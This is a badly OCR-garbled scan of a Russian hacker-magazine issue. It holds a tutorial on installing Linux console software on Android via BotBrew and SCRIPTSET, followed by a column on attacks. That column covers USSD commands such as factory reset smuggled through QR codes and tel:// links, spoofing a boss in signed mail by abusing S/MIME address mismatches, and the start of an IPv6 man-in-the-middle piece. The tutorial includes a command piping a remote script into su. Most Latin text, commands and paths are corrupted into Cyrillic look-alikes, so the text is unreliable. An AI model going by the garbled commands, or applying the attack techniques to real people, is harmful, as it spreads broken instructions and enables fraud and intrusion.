дет, просто удалив один каталог. 

СТАВИМ СОФТ 

Итак, как же использовать ВоШгеѵѵ для установки 
Ыпих-софта? Для начала нам понадобится па- 
кет с самой программой. Он есть в Соодіе РІау 
(отмечу, что нужен ВоШгеѵѵ гооі, а не экспери- 
ментальный ВгагіІ) и весит меньше мегабайта. 
После установки запускаем и нажимаем кнопку 
«Ргосееб» внизу экрана, чтобы софтина выкачала 



все необходимые для ее работы компоненты, та- 
кие как консольный менеджер пакетов, и другие 
утилиты (в терминах ЭеЫап Ыпих — Ьооізігар). 
Весят они всего несколько мегабайт, поэтому 
ждать придется недолго. По окончании установки 
ВоШгеѵѵ выведет на экран окно с официальной ин- 
тернет-страницей проекта, которое можно смело 
закрывать. 

Теперь на экране ты должен увидеть список 
пакетов, доступных к установке. Их довольно мно- 
го, но графических приложений по описанным 
выше причинам ты среди них не найдешь. Зато 
есть разномастные серверы, компиляторы и ин- 
терпретаторы, так что всем, кто хочет серьезно 
«поиграться» со смартфоном, будет где развер- 
нуться. Для установки пакета нужно тапнуть по его 
имени и на следующем экране, содержащем ин- 
формацию о приложении, нажать кнопку «ІпзІаІІ». 

После этого пакет появится на вкладке 
«ІпзІаІІесІ», однако никакой кнопки «Пип» или 
чего-то подобного ты не увидишь. Приложение 
придется самостоятельно запускать из консо- 
ли, что, впрочем, логично. Само приложение 
устанавливается внутрь каталоговой структуры 
/баІа/ЬоІЬгеѵѵ, в котором «эмулируется» реаль- 
ное окружение Ыпих-дистрибутива с каталогами 
/еіс, /изг и другими. А чтобы не мучить пользо- 
вателей необходимостью набирать полный путь 
до команды, разработчики ВоШгеѵѵ предусмо- 
трели одноименную команду-враппер. Чтобы 
с ее помощью запустить, например, установлен- 
ный консольный браузер І_упх, следует набрать 
такую команду: 

$ ЬоІіЬпеіл/ Іупх Ыііір : //хакер . ги 

Как вариант — каталог /сІаІа/ЬоІЬгеѵѵ/Ьіп 
можно добавить в переменную окружения РАТН, 
но это придется делать после каждого запуска 
терминала: 

$ ехрогЕ РАТН="$РАТН: /с!а1=а/Ьо1=Ьпеы/Ьіп" 

С демонами и разными сетевыми сервисами, 
кстати, дела обстоят намного лучше. После стар- 
та демоны сразу будут запущены, а управлять их 
включением можно через графический интерфейс, 
доступный по нажатию на кнопку «РІау» в нижней 
части интерфейса ВоШгеѵѵ. Некоторые приложения 
могут потребовать создания дополнительных поль- 
зователей и изменения их параметров, это можно 
сделать так же, как в обычной Ыпих-системе: 

1 . Создание пользователя: 

$ ЬоІіЬпеы асИизег ѵазуа 

2. Открытие пользователю доступа в интернет: 

$ ЬоІіЬгеы асісі^гоир ѵазѵа іпеі: 

3. Переключение ВоШгеѵѵ на другого пользова- 
теля: 

$ ЬоІіЬгеы з и ѵазѵа 



ВОТВРЕѴѴ: СПИСОК ПОДДЕРЖИВАЕМЫХ УСТРОЙСТВ 



ВоШгеѵѵ был протестирован на следующих устройствах: Вагпез & ІЧоЫе 1ЧООК Соіог, І_С Р970 Орііплиз 
ВІаск, Ниаѵѵеі АзсепсІ М860, НТО Эезіге, НТО Еѵо 4С, НТО Еѵо ЗЭ, НТО Іпзріге 4С, НТО ЭгоісІ Егіз, НТО 
Него, Затзипд Саіаху ІЧехиз, Затзипд Саіаху 52 (СТ-19100), Затзипд Саіаху У (СТ-55360), Моіогоіа 
АІГІХ4С, Моіогоіа ЭгоісІ/МіІезІопе, Зопу Егісззоп ХрегіаХЭ, Азиз ЕееРаб ТгапзТогплег ТР101 . 
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<І5д Ш ІпзіаІІ Іупх 

[ $и] ЬоіЬгел орк§ Іп5іа11 Іупх 

[::] ІП5іа11іп{» Іупх (2.8.8.12-0) іо гооі... 
[::] Соруіп§ /ЬоіЬгею/ѵаг/Ітр/орк§/агсЬіѵе5/ 
1упх_2.8.8. 12-0_агтеаЫ .орк. 

[::] Іп5іа11іп§ псиг5в5-соттоп (5.9-1) іо 
гооі . . . 

[::] Соруіп§ /ЬоіЬгеѵѵ/ѵаг/ітр/орк§/агсЬіѵе5/ 
псиг5е5-соттоп_5.9-1_а11 .орк. 

[::] Іпзіаіііпб ІіЬпсигзезѵѵ (5.9-3) Іо 
гооі . . . 

(::] Соруіп§ /ЬоіЬгеѵѵ/ѵаг/Ітр/орк§/агсЬіѵе5/ 
1іЬпсиг5езѵѵ_5.9-3_агтеаЫ .орк. 

[::] Іп5іа11іп§ 1іЬЬг2 (1.0. 6-3) іо гооі... 
[::] Соруіп§ /ЬоіЬге«/ѵаг/Ітр/орк§/агсЬіѵе5/ 
1іЬЬг2_1 . 0.6-3_агтеаЬі.орк. 

[::] Іп5Іа11іп§ ІіЬісопѵ (1.14-0) Іо гооі... 
[::] Соруіп$» /ЬоіЬгею/ѵаг/ітр/орк§/агсЬіѵе5/ 
1іЬісопѵ_1 . і4-0_агтеаЬі .орк. 

[::] Іп$1а11іп8 ІіЬззІ (1.0. 1-0) Іо гооі... 
[::] Соруіп§ /ЬоіЬгел/ѵаг/Ітр/орк^/агсЬіѵез/ 
1іЬ55І_1 .0. 1 -0_агтеаЫ .орк. 

[::] Іп5іа11іп2 ІіЬтизІ (0.8. 7-1) іо гооі... 
[::] Соруіп§ /ЬоіЬгеѵѵ/ѵаг/ітр/орк|»/агсЬіѵе5/ 
1іЬти5І_0.8.7-1_агтеаЬі .орк. 

[::] Соп^і^игіпй ІіЬтизІ. 

[::] Сопіі^игіпв псигзез-соттоп. 

[::] СопІі§игіп§ ІіЬпсигзезѵѵ. 

[::] Соп7і§ипп§ 1іЬЬг2. 

[::] Сопіі^игіпе ІіЬісопѵ. 

[::] Соп^іВигіпк ІіЬззІ. 

ОК 



Процесс установки пакета 



Обрати внимание, что все эти изменения будут 
касаться только виртуального окружения ВоШгеѵѵ 
и никак не отразятся на основной системе. Кон- 
соль можно использовать также для установки 
приложений в обход графического интерфейса. 
Для этого следует использовать консольный ме- 
неджер пакетов Оркд, синтаксис команд которого 
полностью совместим в арі-деі:: 

$ ЬоІіЬпеы орк^ іпзііаіі сІгорЬеаг 

Обратная операция: 

$ ЬоІіЬгеы орк% гетоѵе сІгорЬеаг 

Чтобы оставаться «на острие прогресса», 
репозиторий ВоШгеѵѵ нужно время от времени 
обновлять, нажав на соответствующую кнопку 
в графическом интерфейсе (ее ни с чем не спу- 
таешь). Новые версии пакетов будут отображать- 
ся на вкладке «ІІрдгасІаЫе». Достаточно тапнуть 
по его имени и нажать «ІІрдгабе». 

ВОТВНЕѴѴ ВКА5ІІ 

В маркете можно найти также приложение под 
названием ВоШгеѵѵ ВгазіІ, помеченное как экс- 
периментальное. По сути, это все тот же ВоШгеѵѵ, 
но с одним весьма важным отличием. Вместо 
собственных репозиториев и менеджера пакетов 
Оркд он использует АВМ-репозитории ОеЬіап 
І_іпих и менеджер пакетов арі-деі. Это значит, 
что количество софта, который можно установить 
с помощью «бразильской версии» приложения, 
намного больше. В десятки раз больше. 

Кроме использования дебиановских ре- 
позиториев, ВгазіІ отличается также слегка 
измененным интерфейсом. Например, сразу 
после запуска он предлагает выбрать каталог 
установки. По умолчанию используется /баіа/ 
ЬоіЬгеѵѵ-ЬгазіІ, что, на мой взгляд, вполне логич- 
но, однако ты можешь выбрать любой другой, 
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<І5еш Вирегѵізог 



ом/ 



ирсіэіесі Воот 

1745:02 ОРР 

ІР | 192.168.0.104 

сІгорЬеаг 

ѵѵагпіпд: сІгорЬеаг: ипаЫе Іо ореп 
зирегѵізе/ок: по* ехізі 

ІідЬПрсІ 

іНіь зегѵісе из сіізаЫесІ 



ВоШгеѵ/ были предоставлены права 
Суперпольэо н ателя 



ВооШгар 



Меісопле. 

Гт Ьеге Іо Иеір уои іпзіаІІ ВоШгеѵѵ. ТЬе Гігзі 

-- Ч|е 

пз!а Оль >а 



ВеГоге I зегісі уои оп уоиг ѵѵау, I соиісі 
до зоте Ьазіс зеіир іо деі уои 
зіагіеб. ѴѴНаі ѵѵоиісі уои Ііке іо бо 
ѵѵііГі ВоШгеѵѵ? 

изез 

ю изе ВоШгеѵѵ оп іИе соплтапб Ііпе 

геііаі 



изе Ібе бркд/АРТ зузіегп 



гип РуіРоп ргодгатз 



іпзіаІІ а тіпітаі ОеЬіап 



/ баіа / Ь оіЬгеѵѵ - Ьаз і I 



Управлять сервисами в ВоШгеѵѵ действительно 
просто 



ВоШгеѵѵ ВгазіІ предлагает несколько вариантов 
установки 



в том числе на ехі2-разделе карты памяти (РАТ 
не подойдет). 

Второе важное отличие — это возможность 
выбрать способ использования приложения, ко- 
торая появляется сразу после нажатия «Ргосееб». 
Вариантов здесь четыре: 

1. ІІзе ВоШгеѵѵ оп іНе соттапсі Ііпе — по сути, 
аналог установки в стиле обычного ВоШгеѵѵ. 

2. ІІзе ііпе бркд/АРТ зузіет — установка вместе 
с арі-деі и репозиториями ОеЬіап. Рекоменду- 
емый вариант установки. 

3. Пип РуіНоп ргодгатз — аналог первого вари- 
анта с автоматической установкой РуіНоп. 

4. ІпзіаІІ а тіпітаі ЭеЬіап — минималистичная 
установка ЭеЫап. 

Поясню второй и четвертый пункты. Первый 
ВоШгеѵѵ и первый пункт в этом списке делают 
не что иное, как установку минималистичной 
Ыпих-системы (состоящую всего из нескольких 
команд и библиотек), внутри которой как раз 
и происходит запуск Ыпих-софта. Однако арі- 
деі, в отличие от минималистичного Оркд, 
требует более-менее полноценной установки 
І_іпих. Поэтому, выбрав второй пункт, ты полу- 
чишь у себя на смартфоне этакий микро-Ыпих. 
А если мы можем установить микроверсию, 
почему бы не установить более-менее полно- 
ценный дистрибутив? Для этого и существует 
четвертый пункт. 

После Ьооізігар’а ВоШгеѵѵ ВгазіІ на экране ото- 
бразится все тот же интерфейс управления уста- 
новкой приложений, знакомый нам по классиче- 
ской версии приложения, а в системе появится 
команда ЬоіЬгеѵѵ2, с помощью которой можно 
запускать софт. Каких-то существенных отличий 
в управлении здесь нет, кроме разве что команды 
арі-деі вместо оркд и возможности подключения 
дополнительных репозиториев (в том числе ре- 
позитория первого ВоШгеѵѵ) прямо через интер- 
фейс установки приложений. 



БЕРЕМ ДЕЛО В СВОИ РУКИ 

Прекомпилированные приложения и репозито- 
рии с готовыми пакетами — это прекрасно, но что, 
если необходимого приложения нет среди до- 
ступных для установки? Ведь даже тот же ВоШгеѵѵ 
ВгазіІ, позволяющий подключать репозитории 
ЭеЬіап с огромным количеством софта, в силу 
своего экспериментального характера заработа- 
ет далеко не на каждом смартфоне. 

В этом случае мы можем попробовать собрать 
приложение самостоятельно. Однако здесь нас 
ждет сразу несколько трудностей: дело в том, 
что для сборки софта для смартфона придет- 
ся подготовить необходимый инструментарий 
кросс-компиляции, затем учесть все зависимо- 
сти собираемого приложения и, наконец, в не- 
которых случаях внести необходимые изменения 
в код. Все это довольно хлопотные дела, которые 
вряд ли стоят того, чтобы тратить на них время. 

Тем не менее мы можем воспользоваться на- 
работками других людей, чтобы автоматизиро- 
вать процесс сборки софта. Одно из наиболее 
развитых и интересных решений из этой обла- 
сти — набор скриптов 8СВІРТ5ЕТ ( аоо.аІ/21аСа ). 
разработанный пользователем зтііпа с ХОА 
йеѵеіорегз. Он позволяет буквально в пару ко- 
манд собрать множество самых разных приложе- 
ний, в числе которых Іііор, ІтадеМадіск, іріаЫез, 
ЕЫпкз, Зсгееп, тс, победа, ЗатЬа, зігасе, ОЕМІІ, 
Рагіеб, ЗАІМЕ (его можно использовать для пря- 
мой печати на принтере с телефона!) и множество 
других. Скрипт сам выкачает кросс-компилятор, 
все необходимые зависимости и приложения, на- 
ложит патчи, где это необходимо, и сгенерирует 
готовый для распаковки на телефон архив. 

ЗСВІРТЗЕТ работает только в Ыпих, но, если 
у тебя ѴѴіпбоѵѵз, ты можешь установить ІІЬипіи 
в виртуальной машине. 

Далее следует открыть терминал и установить 
необходимые для сборки кросс-компилятора ин- 
струменты: 
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Сайт журнала в консольном браузере І_упх 



$ біісіо ар1=-^е1= Іп5і=а11 Ьиі1сІ-е55еп1=іа1 <-■ 
стаке аи1:осоп-Р2.13 зсопз 



После этого можно получить сам 5СВІРТ5ЕТ 
и распаковать его: 

$ ссі ~ а 4 

$ іл/^еі: ІтЕІір: //%оо. %1/2ѵпот -0 <-■ 

5Сгір1і5е1:-2. 6. гір 

$ и пгір 5 с гір1і5е 1:-2. 6.2Ір 

В результате распаковки мы получим... еще 
один архив: зсгір1:5е1:-2.6.1:аг.Ь22. Но и это еще 
не все, архив запакован без традиционного 
для Іаг корневого каталога, поэтому его необхо- 
димо создать самостоятельно. И уже в него про- 
изводить распаковку: 

$ шксііг зсгіріізеі: 

$ ссі зсгір'Ьзе'Е 

$ 1=а г -хі-Р . . /5Сгір1і5е1=-2. 6.1=аг . Ьт .2 



После распаковки в каталоге появится не- 
сколько скриптов, конфигов, а также внуши- 
тельных размеров файл НЕАЭМЕ, содержа- 
щий инструкции по использованию скриптов. 
На скриптах не стоит бит исполнения (что 
не удивляет, учитывая предыдущие заморочки), 
поэтому его надо поставить самостоятельно: 

$ сіітосі 755 *.5Іі 

Далее открываем файл сопТідигаііоп.сопТ 
на редактирование и меняем в нем следующие 
строки: 

# ѵі ~/5Сгір-Ь5е-Ь/соп6дига-Ьіоп.соп-Р 

// Каталог установки приложений 

// на смартфоне 

ТАК6ЕТ_5У$К00Т="/сІа^а/5у5ГОО^" 

// Целевой процессор 

ТАКС Е Т_МАКСН^ " а гтѵ 7-а" 
ТАК6ЕТ_МТЦМЕ="сог1=ех-а9" 

ТАК6ЕТ МРРЦ="пеоп" 

ТАКСЕ Т_МР 1_0АТ=" 5 0~Р~Е~Рр" 

Этого будет достаточно для корректной 
сборки любого приложения; целевым про- 
цессором будет стандартный АНМѵ7 с допол- 
нительным набором инструкций МЕОІЧ. Такой 
установлен в любом смартфоне, выпущенном 
за последние три-четыре года. Каталог /сіаѣа/ 
зузгооі: будет использован для установки прило- 
жений на смартфоне, однако, как это ни стран- 
но, его придется также создать и на настольной 
машине: 

$ біісіо шксііг -р /сІа1=а/5у5поо1= 

$ зисіо сіпоіл/п изегіизегз /сіаііа/зѵзпооі: 

$ зисіо сИтосІ 777 /сіаіга/зузгооі: 

Как объясняет автор скриптов, такое дей- 
ствие необходимо потому, что пути для ключе- 
вых каталогов в некоторые приложения вши- 
ваются на этапе сборки. Поэтому, если бы мы 
собрали приложение, используя в качестве кор- 
невого текущий и любой другой каталог, оно бы 
просто не заработало на смартфоне из-за раз- 
личия в путях. Я уверен, что корректнее было бы 
решить эту проблему с помощью сіігооі:, но про- 
ще и быстрее создать нужный каталог, а по окон- 
чании работ — удалить его. 

Далее мы должны указать список приложений, 
которые планируем собирать. Для этого откры- 
ваем файл раскаде_зеІесііоп.соп^ и меняем по 
на уез в нужных опциях. Например, чтобы собрать 
Ьазіі, ІтадеМадіск и Зсгееп, нужно поменять три 
следующих строки: 



# ѵі ~/5сгір-Ь5е-Ь/раскаее_5е1ес-Ьіоп.соп-Р 

ВА5Н=уез 

ІМА6ЕМА6ІСК=ѵез 

БСКЕЕ^уез 

Имей в виду, что настройки, находящиеся 
между строками # АІ.ѴѴАѴ5 ЫЕЕЭЕЭ, менять нель- 
зя. Эти приложения и библиотеки нужны всегда, 
и без них другие приложения просто не собира- 
ются. Теперь можно скомпилировать приложе- 
ния. Для этого достаточно запустить скрипт ЬиіІсІ. 
зИ без аргументов: 

$ . /Ь иіІсІ . з іі 

Если все необходимые пакеты были уста- 
новлены и компилятор в ходе сборки не выдал 
никаких ошибок, в результате сборки в теку- 
щем каталоге появятся два архива: сз-зузгооТ 
1:аг.Ьг2 и апбгоіб-тузу5гоо1:.1:аг.Ь22. Первый — 
это окружение, необходимое для запуска при- 
ложений, созданное кросс-компилятором, 
а второе — сам набор приложений. Оба этих 
архива необходимо скинуть на карту памяти 
смартфона, а затем, запустив на нем эмулятор 
терминала или подключившись по АЭВ, выпол- 
нить две команды: 

$ 1=аг х^-Р /зсІсагсІ/с5-5у5поо1=.1=аг. Ьг2 
$ 1=аг хі-Р /зсІсагсІ/апсІгоісІ-тѵБѵзгооІ:.^ 
1=аг.Ьг2 



В результате во внутренней памяти смарт- 
фона появится каталог /сіаіа/зузгооі, в котором 
и будут размещены приложения. Запускать их 
следует из того же терминала, указывая полный 
путь. Например: 

$ /сІа1:а/5у5гоо1=/и5г/Ьіп/Ьа5Іі 

Ну или после запуска терминала добавить 
/сІаІіа/зузгооѴизг/Ьіп в РАТН: 

$ ехрогЕ РАТН="$РАТН: /сіаііа/зѵзгооі:/^ 
изг/Ьіп " 

ВЫВОДЫ 

Несмотря на довольно серьезные различия 
между АпбгоісІ и типичным І_іпих- дистрибутивом, 
установить консольные Ыпих-приложения 
на смартфон не так уж и сложно. К сожалению, 
о графических приложениях речи пока не идет, 
но проекты портирования библиотеки СИ и гра- 
фического сервера ѴѴауІапсІ в АпбгоісІ уже есть, 
и в скором времени, надеюсь, мы получим рабо- 
чее решение. НС 



ТАНЦЫ С БУБНОМ 



Если во время Ьооізітар’а ВоІВгеѵѵ возникли проблемы, ты 
можешь попробовать установить его вручную с помощью 
следующей команды: 

м^еі: ІтЕір: //перо. ЬоІіЬпеы. сот/апізе/ЬооІізІігар/^ 
іпзІіаІІ.БІі -0 - | зи 



Если и это не помогло, можно удалить все установки 
(«Ветоѵе ВоіВгеѵѵ» в настройках) и затем попробовать за- 
пустить эту команду. 



Зеетз Іо Ье доосі, а 11 ргодгатз аѵаіІаЬІе - зіагііпд 
ЗыіісЬіпд Іо СойеВелсЬ сгозз-соиірі Іег 
Наѵе Іо ЬиіІсІ алй/ог йоипіоай деііехі 


Запуск сборки 


Наѵе Іо Ьиі Ій алсі/ог йоипіоай 1ІЬхга12 
Наѵе Іо ЬиіІсІ алй/о г йоипіоай РуіЬоп 
Наѵе Іо Ьиі Ій алй/ог йоипіоай геайііпе 
Наѵе іо Ьиі ІЙ алй/ог йоипіоай ЗОІііеЭ 
Наѵе іо Ьиі Ій алй/ог йоипіоай ОрепЗЗЬ 
Наѵе іо Ьиі Ій алй/ог йоипіоай пигзез 
Наѵе іо Ьиі Ій алй/ог йоипіоай г 1 ІЬ 
Наѵе іо Ьиі Ій алй/ог йоипіоай сІІРІ. 

Наѵе іо Ьиі Ій алй/ог йоипіоай ехраі 
Наѵе іо Ьиі Ій алй/ог йоипіоай еіілкз 
Наѵе іо Ьиі Ій алй/ог йоипіоай 1 ІЬТТ і 
Наѵе іо Ьиі Ій алй/ог йоипіоай ІІЬісопѵ 


приложений 


13 раскадез зеіесіей 




Виіійілд пигзез 




шЛісЛ: гю сигі.йопоіапзиег іп ( /Ноте/ ^т/Оезкіор/зсгірізеі/агга-2011 .09/Ьіп : /боте/ Дт/Ып: /изг/1о 
саІ/Ып : /изг/Ьіл : /Ып : /изг/ІосаІ/зЬіл : /иэг/зЬіп : /зЬіп : /орі/^ѵа/Ьіп : /орі/ ^аѵа/йЬ/Ьіл : /орі/ ^аѵа/ ^ 
ге/Ьіп:/изг/Ьіп/соге_рег! :/зЬіп:/изг/5Ьіп:/изг/1оса1/5Ьіл: /Ьоте/.іІт/Оезкіор/зсгірізеі/Ьіл) 


йоипіоайілд Ьіір://Іір.дпи.огд/риЬ/дпи/псигзез/лсигзез-5.9.івг.д2 иіііЬ Ыдеі 






вг 
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Алексей «ОгеепОод» Тюрин, 
ОідііаІ Зесигііу 

адгггсІод@дтаіІ.сот, 

іѵѵіиег.сот/апіуигіп 




Все описанные програм- 
мы со всей рубрики ищи 
на диске 




ПРОВЕСТИ АТАКУ, ИСПОЛЬЗУЯ ОР-КОД 



РЕШЕНИЕ 

Этот номер мы посвятим не самым стандартным и распространенным техно- 
логиям, вернее, атакам на них — местами странным :). И то и другое, я думаю, 
будет полезно. Итак, первый «клиент» сегодня — ОВ-код (Оиіск Везропзе). 
Это двухмерный штрих-код. 

Главные плюсы — возможность хранить большее количество информации 
по сравнению с обычными штрих-кодами, а также возможность скачивать 
данные любым девайсом с камерой. Основной информацией может быть 
текст, ссылка, ЗМЗ или телефон. ОВ-коды и были распространены, и дальше 
набирают популярность. А потому нет ничего удивительного в том, что и их 
сможет как-нибудь заюзать злоумышленник, особенно в связке с социальной 
инженерией. Самым простым вектором будет возможность «заманить» юзе- 
ра на наш хост. Сфоткал человек ОВ-код и — бац — попал на сайт с чем-то 
ужасным :). Но есть и другие возможности. Главное — мыслить шире. 




1 . Код вереи и 

2. Код маски и уровня коррекции 

3. Данные с кодами коррекции 

4. Неизменные части ОН-кода 

4.1 . Поисковый узел 

4.2. Выравнивающий узел 

4.3. Полосы синхронизации 



5. Белое поле 



Структура ОН-кодов 



К примеру, можно выполнить ІІЗЗЭ-команду на телефоне. ІІ88Э 
(ІІпзігисШгесІ Зирріеплепіагу Зегѵісе Эаіа) — «стандартный сервис в сетях 
СЗМ, позволяющий организовать интерактивное взаимодействие между 
абонентом сети и сервисным приложением в режиме передачи коротких со- 
общений», говорит нам ѴѴікі. Например, команда для получения количества 
денежек на счету. Но кроме этого, есть еще и команды, которые обрабаты- 
ваются самим девайсом (телефоном). Из простейших — показ ІМЕІ, показ 
МАС’а ѴѴІ_АІ\Га. Но есть варианты и посерьезней. Что-то вроде пугающего 
«РиІІ Расіогу Везеі» или отправки денежек со своего счета на другой (но там, 
кажется, подтверждение есть, а потому не прокатит). 

Но как же вызвать такой код? С год назад в ряде девайсов под андро- 
идом была найдена бага-фича — возможность использовать протокол 
(схему) Хе\://. Официально она нужна для того, чтобы можно было клик- 
нуть в браузере по ссылке на каком-то сайте и быстро позвонить туда. Так 
вот, добрые люди логично решили, что туда же можно подставить и ІІ35Э- 
команду. Что еще интересней, была возможность запустить команду авто- 
матически — просто заставить браузер открыть іеІ://ІІЗЗЭ. Официально 
бага зафикшена, но я не уверен, что все уже установили соответствующее 
обновление :). 

Конечно, бага эта не совсем напрямую связана с ОВ-кодами, но как один 
из вариантов атаки возможна. На іпТозес’е даже приведен пример. Все, 
что требуется от злоумышленника, — зайти на Нир://додг.пле/ (или какой- 
нибудь аналог) и сгенерить ОВ-код с необходимым пэйлоадом — во вкладке 
«СаІІ» указать необходимую ІІЗЗЭ-команду. 

Успех всего дела зависит от возможности решить следующие проблемы. 
Во-первых, большинство ОВ-геасІег’ов на телефонах показывают, что они 
прочитали, перед тем как самим выполнить какие-то действия. Во-вторых, 
некоторые звонилки не поддерживают такой набор ІІЗЗЭ (а может, таким 
образом и закрыли дырку в андроиде?). С первой проблемой поможет спра- 
виться хорошая социнженерия. Ведь не многие понимают, что телефонный 
номер может быть чем-то плохим. 

Вторую же, как ни странно, она тоже может решить :). Это должно быть 
что-то в джедайском стиле: «эту ІІЗЗЭ-команду набрать хочешь ты». 
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ПРОВЕСТИ СОЦИАЛЬНУЮ ИНЖЕНЕРИЮ «В ОБХОД» 3/МІМЕ 



ІІпаЫе (о ѵегі^у те$$аде зідпаіиге 



Раі <раігіск.8ипз(ап<гЯНН^Наи> 

То: Тіт Воѵѵеп 

іе$і 

Зесигііу: ОЗідпеО (Зегѵісе Оезк) 



іезі 



ІСеіМаіІ ▼ ^ѴѴгйе Ч СЬа* Ж Ас18ге55 Воок | ^Тад^ Оиіск РіИег 



ЗеагсН... <СМ*К> 



Р = 



Ргот Меи 
Бикуесі зтіте Іехі 
То Ме* 

ТѲ5Т 



4ч Керіу ^ Ропл^агсІ О АгсЫ :І« 

I «Ц Ы 

ОіНег Асйоп 



Ме$»де к ядпегі 

АННоидЬ іИе сіідііаі 5Ідпаіиге І5 ѵаіігі, ІЕ І5 ипкпоѵѵп ѵѵНеЕНег хепгіег апсі 5Ідпег аге іИе кате регкоп. 
ТЬе етаіі асісігекк Іікіесі іп 4Не кідпег'к сегіііісаіе і$ сШегепІ Ігот іНе етаіі асісігекк ЕЬаІ ѵѵав и$ес! 

Іо кепсИЫк теккаде. РІеаке Іоок а! ІНе сІеІаіІБ оі іНе кідпаіиге сегШсаіеІо Іеагп ѵѵИо кідпесі іИе 
теиаде. 

ЗідпесІ Ьу: Раігіск Оипйап 

Етаіі асісігезк раігіск. гіип5*ап@^^^^^^аи 

СегЬіТісаІе іккиесі Ьу: АикСЕКТ СІІепІ СА 



I Ѵіеѵѵ Бідпаіиге Сегіііісаіе | 



Меяэде Моі ЕпсгурІе<1 

ТЬІк те5каде ѵѵак по4 епсгуріесі ЬеЕоге ІЕ ѵѵак кепі. ІпЕогтаІіоп 5епЕ оѵег ЕНе ІпЕегпеЕ ѵѵіЕЬоиЕ 
епсіурЕіоп сап Ье $ееп Ьу оіЬег реоріе ѵѵЫІе іп Егап$іЕ. 



Рис. 1 . Хорошая реакция Мае МаіІ 



Рис. 2. Тихая реакция ТИипсІегЬігсІ 



РЕШЕНИЕ 

Продолжим терзать плоть СИ. Давай представим себе ситуацию. Есть ком- 
пания, в которой много народа, и кто-то хочет откуда-то снаружи ее поло- 
мать. Конечно, можно попытаться проникнуть через 50І_і на одном из сайтов 
компании или проэксплуатировать какой-нибудь сервис. Но опыт подсказы- 
вает, что простейший путь — лайтовая СИ и почтовая рассылка на адреса 
компании. Конечно, нужно добыть их список. Но тут поможет гугление и дру- 
гие средства сбора инфы, а также ряд уязвимостей в конфигурации етаіі- 
серверов (их мы обсуждали в одном из номеров ][). 

Вообще, в проведении хорошей СИ с использованием почты есть 
множество всяких тонкостей. Один из самых перспективных вариантов — 
это послать письмо от имени одного из сотрудников компании другим со- 
трудникам. Особенно хорошо от начальника — тогда и экзешничек люди 
не побоятся запустить :). Но на пути атакующего может встать и хорошая 
конфигурация ЗМТР-сервера компании, и всевозможные антиспам-систе- 
мы и даже антивирусы. И кроме того, такая вещь, как 5/МІМЕ. Про обход ее 
мы и поговорим. 

По вики: «5/МІМЕ (Зесиге/МиШригрозе Іпіегпеі МаіІ Ехіепзіопз) — стан- 
дарт для шифрования и подписи в электронной почте с помощью открытого 
ключа. 5/МІМЕ предназначена для обеспечения криптографической без- 
опасности электронной почты. Обеспечиваются аутентификация, целост- 
ность сообщения и гарантия сохранения авторства, безопасность данных 
(посредством шифрования)». По факту это некий аналог 55І_, только для по- 
чты. Для работы тебе требуется создать открытый и закрытый ключи, а так- 
же получить сертификат, подписанный одним из центров сертификации. 
Официально, получив от злоумышленника письмо, зашифрованное с ис- 
пользованием 3/МІМЕ, жертва сможет проверить и убедиться, что письмо 
прислано именно от тебя. То есть вектор с письмом от начальника не про- 
катил бы. Жертва увидит, что это не подписанное обычно письмо, сразу за- 
подозрит неладное и вызовет службу безопасности :). 

Но-но-но... Так как этой темой занимались (читай: ломали) не так мно- 
го людей, как с 55І_, то и проблемы здесь всплывают нам уже знакомые. 
Теория теорией, а во внедрении всегда будут дырки. Итак, не очень давно 
на сайте был показан небольшой тест, как ведут себя основные 

корпоративные клиентские продукты (М3 ОіШоок, ТИипсІегЫгсІ, Мае таіі) 
при получении письма. Не простого письма, а подписанного с использова- 
нием 5/МІМЕ. Но при этом етаіі в поле ГРОМ (от кого) не совпадает с тем, 
что указан в сертификате 5/МІМЕ, а сам сертификат верен и подписан ав- 
торизованным удостоверяющим центром. То есть здесь была эмулирована 
аналогичная с 55І_ ситуация, когда имя хоста СІМ (соплтоп пате) не совпа- 
дает с именем хоста, куда произошло подключение (то, что в адресной стро- 
ке). Браузеры в таком случае показывают страшные таблички с предупреж- 
дениями, а что у почтовиков? 

Результат оказался очень забавным: только Мае МаіІ выдал дельное 
предупреждение. ТНипсіегЫгсІ лишь пометил небольшим значком, а М3 
ОиІІоок вообще не увидел никакой проблемы. И это при том, что М3 плотно 
поддерживает стандарт 5/МІМЕ. 



Таким образом, по идее, все, что необходимо для проведения атаки, — 
получить сертификат 5/МІМЕ от одного из доверенных центров сертифика- 
ции. По сути, это все те же Тілаѵѵіе, Соплосіо, ѴегіЗідп и так далее. У Соплосіо 
к тому же вроде бы можно даже получить его бесплатно. 

Признаюсь, сам это не тестировал, но скриншоты от автора статьи долж- 
ны быть вполне показательны (см. рис. 1,2,3). 

Желательно, конечно, еще уточнить, что конкретно юзает наша жертва 
в качестве таіГера, а также антиспам- и антивирус-системы в компании, 
чтобы быть во всеоружии. Но, как я вроде уже писал, для начала работы же- 
лательно получить хотя бы одно письмо из компании. В заголовках письма 
почти стопроцентно будет и таіі-клиент, и, хотя бы косвенно, версии ПО. 
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ПРОИЗВЕСТИ МІТМ-АТАКУ, ИСПОЛЬЗУЯ ІРѴ6 



РЕШЕНИЕ 

Итак, обычная ситуация: есть некая корпоративная сеть, в ней пользова- 
тель (наша жертва) и сервер, на котором пользователь аутентифицируется. 
И задача атакующего — внедриться в сетевое подсоединение между ними, 
то есть провести атаку тап іп Ше тісісііе. 

В рамках Базу Наск’а мы уже разбирали пучок методов, которые позво- 
лили бы добиться внедрения. Это и атаки на ЭІ\ІЗ, І4ВЫ5, и ІСМР гебігесі:, и, 
конечно, классическая АВР роізопіпд. В сле- 
дующих номерах мы еще коснемся более 
извращенных и более специфичных МІТМ- 
атак, но сейчас давайте вспомним, что XXI 
век на дворе. А что это нам несет? Конечно, 

ІРѵб :). Вот сегодня мы и узнаем основные 
методы МІТМ в ІРѵб. 

Для начала на всякий случай отмечу, 
что МІТМ’ы более высоких уровней (над ІР- 
уровнем) останутся неизменными по сути. 

Меняется ведь только протокол ІР, то есть 
основная идея ЭИЗ-спуфинга будет той же 
(хотя имплементацию нужно менять). 

С другой стороны, мы лишаемся такой 
шикарной вещи, как АВР зрооНпд. В ІРѵб та- 
кой протокол отсутствует. Что можно сделать 
в новом протоколе? Давай вернемся к осно- 
вополагающим задачам, лежащим на плечах 
ІРѵб, а также к тому, как они были решены. 

Одной из главных задач, которая рань- 
ше решалась посредством АВР в ІРѵ4, было 
«нахождение» хоста. То есть поступает за- 
дача подключиться к какому-то ІР, но ведь 
для фактического подключения сетевой 
подсистеме надо знать МАС-адрес конеч- 
